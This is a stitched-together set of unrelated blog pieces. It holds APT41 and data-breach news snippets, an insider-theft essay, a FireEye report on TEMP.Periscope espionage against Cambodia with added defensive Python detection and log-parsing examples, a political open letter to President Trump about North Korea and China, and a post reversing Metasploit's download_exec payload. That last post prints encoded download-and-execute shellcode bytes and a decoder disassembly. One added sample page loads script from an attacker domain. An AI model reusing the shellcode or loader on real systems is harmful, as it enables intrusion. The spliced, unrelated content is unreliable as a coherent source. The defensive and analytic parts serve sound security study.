Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enable it to conduct its own for-profit activities, or that authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.

How Chinese spy app allows officials to harvest personal data

Intrusive software collects emails and texts and could be used to track movement

The tourists travelling into China were never supposed to know their phones had been compromised.

The surveillance app being installed on their devices should have been removed by the border officers tasked with the job. But their apparent carelessness has provided a rare insight into the techniques used by China to snoop on visitors and the kind of information being harvested from their phones.


Australian National University hit by huge data breach

Vice-chancellor says hack involved personal and payroll details going back 19 years

The Australian National University is in damage control after discovering a major data breach a fortnight ago in which a “significant” amount of staff and student information was accessed by a “sophisticated operator”.

The university has confirmed an estimated 200,000 people have been affected by the hack, based on student numbers each year and staff turnover.



Forcing the Adversary to Pursue Insider Theft

Jack Crook pointed me toward a story by Christopher Burgess about intellectual property theft by "Hongjin Tan, a 35 year old Chinese national and U.S. legal permanent resident... [who] was arrested on December 20 and charged with theft of trade secrets. Tan is alleged to have stolen the trade secrets from his employer, a U.S. petroleum company," according to the criminal complaint filed by the US DoJ.

Tan's former employer and the FBI allege that Tan "downloaded restricted files to a personal thumb drive." I could not tell from the complaint if Tan downloaded the files at work or at home, but the thumb drive ended up at Tan's home. His employer asked Tan to bring it to their office, which Tan did. However, he had deleted all the files from the drive. Tan's employer recovered the files using commercially available forensic software.

This incident, by definition, involves an "insider threat." Tan was an employee who appears to have copied information that was outside the scope of his work responsibilities, resigned from his employer, and was planning to return to China to work for a competitor, having delivered his former employer's intellectual property.

When I started GE-CIRT in 2008 (officially "initial operating capability" on 1 January 2009), one of the strategies we pursued involved insider threats. I've written about insiders on this blog before but I couldn't find a description of the strategy we implemented via GE-CIRT.

We sought to make digital intrusions more expensive than physical intrusions.

In other words, we wanted to make it easier for the adversary to accomplish his mission using insiders. We wanted to make it more difficult for the adversary to accomplish his mission using our network.

In a cynical sense, this makes security someone else's problem. Suddenly the physical security team is dealing with the worst of the worst!

This is a win for everyone, however. Consider the many advantages the physical security team has over the digital security team.

The physical security team can work with human resources during the hiring process. HR can run background checks and identify suspicious job applicants prior to granting employment and access.

Employees are far more exposed than remote intruders. Employees, even under cover, expose their appearance, likely residence, and personalities to the company and its workers.

Employees can be subject to far more intensive monitoring than remote intruders. Employee endpoints can be instrumented. Employee workspaces are instrumented via access cards, cameras at entry and exit points, and other measures.

Employers can cooperate with law enforcement to investigate and prosecute employees. They can control and deter theft and other activities.

In brief, insider theft, like all "close access" activities, is incredibly risky for the adversary. It is a win for everyone when the adversary must resort to using insiders to accomplish their mission. Digital and physical security must cooperate to leverage these advantages, while collaborating with human resources, legal, information technology, and business lines to wring the maximum results from this advantage.

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally


FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and a wide array of malicious tools, and targets a large victim set, which is in line with typical China-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group. We observed the toolsets we previously attributed to this group, their observed targets are in line with past group efforts and also highly similar to known Chinese APT efforts, and we identified an IP address originating in Hainan, China that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."

Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. This TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX).

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.

Figure 2: Human right protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).

Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academia, aviation, chemicals, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB), possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to business worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Redirect Site (Not Malicious) | AIRBREAK Downloader
(not recoverable) | TOP_NEWS_Japan_to_Support_the_Election.js (3c51c89078139337c2c92e084bb0904c) [Figure 4]
(not recoverable) | Philippines-draws-three-hard-new-lines-on-china.js

Table 1: AIRBREAK downloaders

Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.
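A strategic web compromise of the kind that delivers SCANBOX usually leaves a trace on the compromised site: an injected script element or a hidden iframe that loads from a domain the site has no business loading from. The following is an added example, not code from the FireEye report. It lists every external script, iframe, embed or object reference in a page whose host is outside the site's own allowlist; the HTML and the allowlist are constructed, and the SCANBOX host it models is the mlcdailynews[.]com domain named above.

```python
"""List remote script/iframe/embed/object loads on a page that are not from allowed hosts.

Added example, not code from the FireEye report. Strategic web compromise that
delivers SCANBOX-style profiling code normally appears as an injected <script>
or hidden <iframe> pointing at an attacker domain; this checker reports every
such reference whose host is off the site's allowlist. The HTML and the
allowlist are constructed; the SCANBOX host is the domain named in the report.
"""
from html.parser import HTMLParser
from typing import List, Set, Tuple
from urllib.parse import urlparse


class RemoteLoadFinder(HTMLParser):
    """Collect (tag, url) for elements that execute or embed remote content."""

    WATCHED = {"script": "src", "iframe": "src", "embed": "src", "object": "data"}

    def __init__(self) -> None:
        super().__init__()
        self.loads: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs) -> None:
        wanted = self.WATCHED.get(tag.lower())
        if wanted is None:
            return
        for name, value in attrs:
            if name.lower() == wanted and value:
                self.loads.append((tag.lower(), value.strip()))


def unexpected_loads(html: str, allowed_hosts: Set[str]) -> List[Tuple[str, str]]:
    """Return (tag, url) for loads whose host is not in allowed_hosts.

    Relative URLs (no host) are same-origin and skipped; scheme-relative
    URLs such as //evil.example/x.js are resolved to their host and checked.
    """
    finder = RemoteLoadFinder()
    finder.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    suspicious = []
    for tag, url in finder.loads:
        host = urlparse(url).hostname
        if host is None:
            continue
        if host.lower() not in allowed:
            suspicious.append((tag, url))
    return suspicious


# Constructed page for a fictional news site; the last two elements model the
# injection that sends visitors to the SCANBOX server.
SAMPLE_PAGE = """<html><head>
<script src="/assets/site.js"></script>
<script src="https://cdn.example-news.com/jquery.min.js"></script>
</head><body>
<h1>Leaders confident yet nervous</h1>
<script type="text/javascript" src="http://mlcdailynews.com/plugin/jquery.js"></script>
<iframe src="//mlcdailynews.com/i.php" width="0" height="0"></iframe>
</body></html>"""

ALLOWED_HOSTS = {"www.example-news.com", "cdn.example-news.com"}

if __name__ == "__main__":
    for tag, url in unexpected_loads(SAMPLE_PAGE, ALLOWED_HOSTS):
        print(f"unexpected {tag} load: {url}")
```

Run this against a crawled snapshot of your own site on a schedule and diff the results; the allowlist should be exactly the CDN and analytics hosts you deliberately use. Injected loaders are frequently added by inline JavaScript rather than static markup, so the check is stronger on a rendered DOM (dumped from a headless browser) than on the raw HTML served to the crawler.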

Figure 5: SCANBOX welcome page

Copied Article Topic, grouped by Article Source (Not Compromised):

  • Khmer Times
    • Leaders confident yet nervous
    • Mahathir_ 'We want to be friendly with China
    • PM urges voters to support CPP for peace
    • CPP determined to maintain Kingdom's peace and development
    • Bun Chhay's wife dies at 60
    • Crackdown planned on boycott callers
    • Further floods coming to Kingdom
    • Kem Sokha again denied bail
    • PM vows to stay on as premier to quash traitors
  • Fresh News
    • Iran_ Don't trust Trump
    • Kim-Trump summit_ Singapore's role
    • Trump's North Korea summit may bring peace declaration - but at a cost
  • Phnom Penh Post
    • Interior Minister Sar Kheng warns of dirty tricks
    • Another player to enter market for cashless pay
  • ABC News
    • Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America
  • The Cambodia Daily
    • China-funded national road inaugurated in Cambodia
  • Asia Times
    • Kim and Trump in first summit session in Singapore
  • U.S. News
    • U.S. to suspend military exercises with South Korea, Trump says
  • Source not listed
    • U.S. pushes NATO to ready more forces to deter Russian threat
    • Rainsy defamed the King_ Hun Sen
  • Associated Press (article topic not listed)

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).

  • EVILTECH (backdoor)
    • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
    • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.
  • DADBOD (credential theft)
    • DADBOD is a tool used to steal user cookies.
    • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of the IP addresses is located in Hainan, China. Other addresses belong to virtual private servers, but artifacts indicate that the computers used to log in were, in all cases, configured with Chinese language settings.
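The attribution reasoning above (who authenticated to the panel, from which addresses, and with what locale on the client machine) is a log-parsing exercise once a C2 server's logs are in hand. The block below is an added example, not code from the FireEye report. It assumes the panel's web server wrote a combined-format access log extended with the Accept-Language request header as a final quoted field; every log line, IP address and lookup-table entry in it is constructed.

```python
"""Summarize who logged in to a captured C2 control panel, and from where.

Added example, not code from the FireEye report. Assumes the panel's web server
wrote a combined-format access log with the Accept-Language request header
appended as a final quoted field (a common custom LogFormat). All log lines,
IP addresses and the hosting/geo lookup table below are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List

LOG_LINES = """\
203.0.113.10 - - [02/Jun/2018:01:12:44 +0000] "POST /panel/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)" "zh-CN,zh;q=0.9"
203.0.113.10 - - [02/Jun/2018:01:13:02 +0000] "GET /panel/bots.php HTTP/1.1" 200 8812 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)" "zh-CN,zh;q=0.9"
198.51.100.77 - - [03/Jun/2018:14:40:10 +0000] "POST /panel/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "zh-CN,zh;q=0.8,en;q=0.5"
198.51.100.77 - - [03/Jun/2018:14:41:55 +0000] "GET /panel/tasks.php?bot=4417 HTTP/1.1" 200 1290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "zh-CN,zh;q=0.8,en;q=0.5"
192.0.2.200 - - [04/Jun/2018:09:05:31 +0000] "GET /panel/ HTTP/1.1" 401 0 "-" "python-requests/2.18.4" "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" "(?P<lang>[^"]*)"$'
)

# Constructed stand-in for an ASN/geo lookup (in practice: MaxMind, Team Cymru, RIR data).
IP_CONTEXT = {
    "203.0.113.10": {"country": "CN", "region": "Hainan", "hosting": False},
    "198.51.100.77": {"country": "US", "region": "-", "hosting": True},
}
UNKNOWN = {"country": "?", "region": "?", "hosting": None}


def parse_log(text: str) -> List[Dict[str, str]]:
    """Parse every line that matches the assumed format; silently skip the rest."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def primary_language(accept_language: str) -> str:
    """First tag of an Accept-Language value, e.g. 'zh-CN,zh;q=0.8' -> 'zh-CN'."""
    return accept_language.split(",")[0].split(";")[0].strip()


def operator_summary(records: List[Dict[str, str]]) -> Dict[str, Dict]:
    """Per source IP: successful panel activity, unauthenticated probes, locales seen, and context.

    likely_operator is the report's reasoning in code: the client got past the
    login and the machine it ran on was configured for Chinese.
    """
    acc = defaultdict(lambda: {"panel_hits": 0, "unauth_hits": 0, "languages": set(), "first": None, "last": None})
    for r in records:
        e = acc[r["ip"]]
        if r["status"] in ("200", "302"):
            e["panel_hits"] += 1
        else:
            e["unauth_hits"] += 1
        if r["lang"] != "-":
            e["languages"].add(primary_language(r["lang"]))
        e["first"] = e["first"] or r["ts"]
        e["last"] = r["ts"]
    out = {}
    for ip, e in acc.items():
        langs = sorted(e["languages"])
        out[ip] = {**e, "languages": langs, **IP_CONTEXT.get(ip, UNKNOWN),
                   "likely_operator": e["panel_hits"] > 0 and any(l.startswith("zh") for l in langs)}
    return out


if __name__ == "__main__":
    for ip, info in operator_summary(parse_log(LOG_LINES)).items():
        print(ip, info)
```

Accept-Language is only one locale leak; the panel's own database, metadata in uploaded files and the time zone of timestamps in operator-authored tasks are others worth correlating. Logins from hosting providers (198.51.100.77 in the constructed sample) say little about geography on their own, which is why the locale the client carried matters more than the address, as the report's reasoning reflects.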

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised – simply gathering intelligence or as part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

A Suggestion for President Trump regarding Dealing with North Korea

Dear President Trump,

Hello. As President of Paramount Defenses, I pen this letter most respectfully to you, the President of our United States.

Sir, almost all reasonable people would agree that a bellicose and now nuclear North Korea likely poses a threat not just to the United States but to the whole world, and that this threat must be dealt with. While there are several options, including military options, that you may be considering, I just wanted to say that you may want to give a peaceful resolution to this situation a reasonable chance (because wars are gruesomely destructive), and perhaps there may be still something that could be done.

Of course, North Korea must make no mistake about one fact - it must unequivocally understand that if it attacks the U.S. or its territories or allies, the U.S. will have no choice but to act to defend itself, and if it does, it will likely be the end of North Korea.

Speaking of Nuclear Weapons and North Korea

I likely speak on behalf of not just millions of American citizens, but billions of people worldwide when I say that this dangerous "sabre rattling" needs to please stop; we just cannot have a(ny) country threatening the world with the use of Nuclear Weapons.

Nuclear Weapons

We should also make NO mistake about this - This must please stop, and yet we must try and do all we can do to resolve this PEACEFULLY, because wars are gruesomely destructive. It is estimated that should this situation result in a war on the Korean peninsula, millions of people in numerous countries may lose their lives and/or be severely impacted.

If I might add, in today's civilized world, no one person in the world, whether it be the leader of any country (whether it be North Korea, Iran, China, Russia, USA, etc.) or entity should be able to endanger the lives of all 7,000,000,000+ people on Earth.

Speaking of peaceful efforts, allow me to voice one unsolicited suggestion, which involves a country that may likely have, over the years, whether unintentionally or otherwise, played^ a (not so small) role in helping North Korea get where it is today, and they now ought to do everything they can to help resolve this situation peacefully, and that one country is China.

 [ ^ Watch this 6 min video - "China is North Korea's largest trading partner and has pushed hard for the livelihood exemptions" , "Sanctions will only be as effective as Beijing wants them to be" , "Regime survival is exactly what China actually wants to see"]

Where Does China Stand on This?

Sir, as of Aug 11, 17, you've certainly tried to have China resolve this problem. However, it does not seem to (yet) have worked.

As of this morning, according to the Global Times newspaper, which, although not an official mouthpiece of the Communist Party, does according to experts most likely reflect government policy, China is likely okay with an armed conflict in the region.

I quote from here -
"Beijing is not able to persuade Washington or Pyongyang to back down at this time. It needs to make clear its stance to all sides and make them understand that when their actions jeopardize China's interests, China will respond with a firm hand."
"China should also make clear that if North Korea launches missiles that threaten U.S. soil first and the U.S. retaliates, China will stay neutral. If the U.S. and South Korea carry out strikes and try to overthrow the North Korean regime and change the political pattern of the Korean peninsula, China will prevent them from doing so."

In other words, by not being against it, China is apparently tacitly okay with an armed conflict in the region. That's concerning.

Today, no country in the world should be okay with any such conflict, especially one involving countries with Nuclear Weapons.

China needs to realize that now is the time to respond to North Korea with a firm hand, lest it be too late and cost 100x.

China may need to unequivocally understand that this isn't just about a regional conflict or stability in one specific region of the world, but that this could result in the use of Nuclear Weapons and that could potentially dangerously impact the entire world.

The Suggestion - Having China Do More

In reality, as its largest trading partner, China does likely have a substantial amount of influence on North Korea, which is also why most sanctions imposed on North Korea by the U.N. thus far may have only been as effective as China wanted them to be.

Thus, perhaps, all countries in the world that desire peace, led by the U.S., should earnestly communicate to China that unless China does more to help, the world may have no choice left but to begin to look into potentially unfair Chinese trade practices and consider* (even if temporarily) substantially reducing their imports from China (i.e. the import of goods Made in China).

Perhaps, as a consequence, if China realizes that the world may seriously no longer be interested in importing its inexpensive goods, and that it may stand to lose up to a Trillion $ in trade each year, unless it "reins in" North Korea, perhaps it will do more.

(As such, China should be quite concerned about the possibility of any armed conflict in its region as it could impact its people. If concern for the safety of its billion+ people doesn't motivate China, perhaps the potential of a Trillion $ a year of loss, may.)

China may very well understand this today, so they need to flex some serious muscle to help resolve this dangerous situation.

[ A small digression...

An Unintended Impact

Incidentally, this could help kick-start your Made in USA initiative, and perhaps help reduce the trade imbalance with China, and although products for the U.S. consumer may no longer be dirt cheap, it could start bringing back American manufacturing jobs, thus helping your #MAGA slogan.

Speaking of #MAGA, while America is already a great country, its greatness may likely indeed have diminished a bit in light of globalization, and speaking of jobs, perhaps it may help to let the American people know that it is our own companies, i.e. the major companies whose products the American populace consumes, that whether driven by fierce competition and/or a desire to "maximize shareholder value", may have over the years substantially outsourced manufacturing, and it may be up to the people to consider having (and if they decide, could have) these companies put country/security ahead of maximizing profits.

(It is difficult to walk into a Walmart or a Home Depot anywhere in the U.S. and find any products that are not "Made in China." Obviously, since you Sir, are (supposedly) a Billionaire, I do not expect you to have personally walked into a Walmart or a Home Depot, but in all likelihood a majority of all hard-working people living in the U.S. may likely know what I'm talking about.)

Lastly, perhaps we, the American people may also need to realize that it may not likely be possible to simultaneously have both, "dirt-cheap (i.e. super inexpensive) products" and "American manufacturing jobs." Perhaps, if there is a strong desire to bring back manufacturing jobs to the U.S., it may require, even if for a bit, some adjustments as consumers - perhaps consume a little less, but buy quality products that are Made in USA as well as made in all such countries that adhere to fair trade practices.

Here, I should mention that it is also certainly possible for (a more responsible and fairly competing) China to continue to be a major exporter of goods to the U.S., just as long as the Chinese too engage in manufacturing under fair trade practices, fair employment, regard for the environment, and for human rights, thus making the manufacturing playing-field level for all nations.

Alternatively, in lieu of having thousands of companies bring back manufacturing jobs to America, perhaps we could make solid results-driven investments towards helping our workforce acquire skills in those fields and industries that play a substantial role in contributing to America's exports, in effect helping millions of our people find suitable, respectable and gainful employment, as well as contributing to an increase in American exports, which too will have the effect of improving uneven trade deficits.

Speaking of Made in USA, perhaps the best way for you Sir, to demonstrate your commitment and seriousness of purpose to #MAGA, may likely be to lead by example and have all products made by the Trump Organization be made here in USA.

... end of digression.]

In Summary

The World should stand united on one front - regarding threats involving use of Nuclear Weapons, there must be zero tolerance.

As for North Korea, it must make no mistake about one fact - it must unequivocally understand that if it attacks the U.S. or its territories or allies, the U.S. will have no choice but to act to defend itself, and if it does, it will likely be the end of North Korea.

The Chinese too must understand that any military conflict in their region, especially one potentially involving the use of even a single nuclear weapon, and its fallout, could endanger not just all the countries in the Korean Peninsula, but also likely threaten and perhaps possibly jeopardize the very existence of Earth, and the last I checked, a billion Chinese people too, live on Earth.

If millennia of history haven't taught us about the horrors and savagery that military conflicts and wars entail, and if millennia of progress haven't made us all realize that we all need to peacefully co-exist, then while we may have made material progress, what have we truly learnt?

Instead of predominantly pursuing profits, world-domination and egos, we should (all) instead be first pursuing peace, love and harmony, improving life for everyone, and cherishing and saving our precious planet (because in the Universe, it's all we have.)

Most respectfully,

PS: I write neither as a Republican nor a Democrat, merely as a caring citizen, and not just as a U.S. citizen, but as a peace-loving global citizen, i.e. just one of 7,000,000,000+ people that live in 150+ countries worldwide who believe in living in Peace.

*A Note to China: We respect almost everyone, including your great nation, we mean no disrespect whatsoever, and like you we believe in fair trade, including with your nation, but far more importantly, we also value and believe in peaceful co-existence (as should you), so if the suggestion made above seems a tad extreme, please consider that it is only made in light of far more extreme circumstances i.e. a belligerent North Korea threatening (in effect, not only) the U.S. (but global security) with WMDs.

You ought to ask yourselves if you're really doing everything you can to defuse this incredibly reckless and dangerous situation; should this result in an armed conflict in your region, your great country and its people may very likely be substantially impacted.

This is not the time for any party to play "Chess." This is the time for all countries to help prevent a potentially nuclear conflict.

Musings on download_exec.rb


This is not anything new and exciting¹, and should hopefully be familiar to some of you reading this. Some time ago I reversed the shellcode from Metasploit's download_exec module. It's a bit different from the rest of the stuff in MSF, because there's no source code with it, and it lacks certain features that the other shellcode[s] have (like being able to set the exit function).

When I started writing this blog post, the day before yesterday, I looked into the history of this particular scrap of code…

It's very similar to lion's downloadurl_v31.c available here:

… Except that, that code seems to be a more recent version than the code in MSF. For example, that does the LSD-PL function name hash trick, rather than lug around the full function names for look-up (as the version in MSF does.)

So, lion was a major figure in the Chinese 红客 Honker scene — literally translated as Red Guest (or Red Visitor or Red Passenger). (Basically Hackers who are also Chinese nationalists.) His group was the Honker Union of China [HUC], — this site seems to have been dead for a while. He wrote a lot of code back in 2003 and 2004. (I now understand a little about writing these Chinese characters!)

I managed to dig up an older version of this 'downloadurl' code dated 2003-09-01 which is closer to the code in MSF. [archive] The code credits ey4s (from XFocus I think) for the actual shellcode.

Anyway, big chunks of this code, like the whole PEB method, also look like they were directly copied from Skape's old stuff (Dec 2003) — which was copied from Dino Dai Zovi (Apr 2003) — which was copied from Ratter/29A (Mar 2002) etc. etc. Like I said, this is all very old stuff. None of it has really changed since 2002, and it's still in very common use.

pita's contribution to all this appears to be wrapping up the blob of code output by the lion program above into a MSF2 module:

Meta Commentary

What is the plural of the word shellcode? Neither shellcodes nor shellscode sound right. I believe that the word shellcode is a mass noun, so it's the same singular as plural. (Or at the very least, it only sounds right as a plural when used with a plural verb.) If I have some shellcode, and I add some more shellcode to that, then I still have some shellcode, more shellcode than before.

Bob has one shellcode.
Alice wrote three shellcode.
Malory has a lot of shellcode.

Bob has one shellcode.
Alice wrote three shellcodes.
Malory has a lot of shellcodes.

Here is shellcode.        ← Sounds ok to me.
Here is a shellcode.      ← No, sounds wrong.
Here is some shellcode.   ← Sounds ok to me.
Here is some shellcodes.  ← No, sounds wrong.
Here are some shellcode.  ← Doesn't sound right either.
Here are some shellcodes. ← Sounds ok to me.

Long Technical Part

Let's take a look at the MSF code:

# This file is part of the Metasploit Framework and may be subject to

      'License'    => BSD_LICENSE,
      'Platform'   => 'win',
      'Arch'       => ARCH_X86,
      'Privileged' => false,
      'Payload'    =>
        {
          'Offsets' => { },
          'Payload' =>

The decoder is self-explanatory, so I don't know why I'm explaining it, anyway… It finds where it is in memory, XORs the encrypted code right after it, and then runs the decrypted code.

0000  EB10         jmp short 0x12           ; Get EIP trick
0002  5A           pop edx                  ; EDX points to the start
                                            ; of the encoded shellcode
0003  4A           dec edx                  ; The LOOP exits at ECX=0,
                                            ; so XOR [EDX+0],0x99 never
                                            ; happens (Last XOR is [EDX+1])
0004  33C9         xor ecx,ecx              ; ECX = 0
0006  66B93C01     mov cx,0x13c             ; Shellcode length = 0x13C
000A  80340A99     xor byte [edx+ecx],0x99  ; Encoder/Decoder (xor) Key=0x99
000E  E2FA         loop 0xa                 ; XOR each byte from the end
                                            ; to the beginning
0010  EB05         jmp short 0x17           ; Run decoded shellcode
0012  E8EBFFFFFF   call 0x2                 ; PUSH EIP
0017  ...                                   ; Start of shellcode

Here's the decrypted shellcode, side by side with the original.


"\x70\x4C\x99\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"+ #000 e9 d5 00 00 00 5a 64 a1 30 00 00 00 8b 40 0c 8b |.....Zd.0....@..|
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"+ #010 70 1c ad 8b 40 08 8b d8 8b 73 3c 8b 74 1e 78 03 |p...@....s<.t.x.|
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"+ #020 f3 8b 7e 20 03 fb 8b 4e 14 33 ed 56 57 51 8b 3f |..~ ...N.3.VWQ.?|
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"+ #030 03 fb 8b f2 6a 0e 59 f3 a6 74 08 59 5f 83 c7 04 |....j.Y..t.Y_...|
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"+ #040 45 e2 e9 59 5f 5e 8b cd 8b 46 24 03 c3 d1 e1 03 |E..Y_^...F$.....|
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"+ #050 c1 33 c9 66 8b 08 8b 46 1c 03 c3 c1 e1 02 03 c1 |.3.f...F........|
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9D\xC0"+ #060 8b 00 03 c3 8b fa 8b f7 83 c6 0e 8b d0 6a 04 59 |.............j.Y|
